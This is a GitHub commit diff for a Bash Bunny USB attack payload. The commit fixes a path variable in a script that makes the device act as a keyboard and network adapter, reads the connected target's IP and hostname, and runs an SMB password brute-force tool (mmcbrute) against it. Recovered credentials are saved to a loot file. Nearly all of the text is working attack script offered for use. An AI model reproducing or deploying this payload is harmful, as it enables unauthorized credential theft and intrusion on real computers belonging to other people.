Critical fixes

I really missed the BB's original variable "$SWITCH_POSITION" since in my testing BB's payload I'm maintaining it in my code as: 

ORIGINAL_SWITCH="/root/udisk/payloads/$SWITCH_POSITION"

Thanks to @catatonicprime for offering the fix for this issue.
pull/383/head
Mohamed A. Baset 2019-06-01 02:22:45 -05:00 committed by GitHub
parent 6ee12332e5
commit 3980bab638
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 7 deletions

View File

@ -4,16 +4,18 @@
# Author: Mohamed A. Baset (@SymbianSyMoh)
# PS: This is the shittiest bash script you'll ever see :D
password_process_file="$ORIGINAL_SWITCH/ppf.txt"
password_loot_file="$ORIGINAL_SWITCH/credentials.txt"
user_bruteforce_list="$ORIGINAL_SWITCH/userlist.txt"
pass_bruteforce_list="$ORIGINAL_SWITCH/passlist.txt"
# Setup
LED SETUP
CUCUMBER PLAID
ATTACKMODE HID RNDIS_ETHERNET
mount /dev/nandf /root/udisk/
GET SWITCH_POSITION
BBSWITCH="/root/udisk/payloads/$SWITCH_POSITION"
password_process_file="$BBSWITCH/ppf.txt"
password_loot_file="$BBSWITCH/credentials.txt"
user_bruteforce_list="$BBSWITCH/userlist.txt"
pass_bruteforce_list="$BBSWITCH/passlist.txt"
mmcbrute_path="$BBSWITCH/mmcbrute"
ATTACKMODE HID RNDIS_ETHERNET
GET TARGET_IP
GET TARGET_HOSTNAME
@ -23,7 +25,7 @@ echo $TARGET_HOSTNAME >> $pass_bruteforce_list
# Perform SMB bruteforce attack
LED STAGE1
python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file
python $mmcbrute_path/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file
# Check for results
LED STAGE2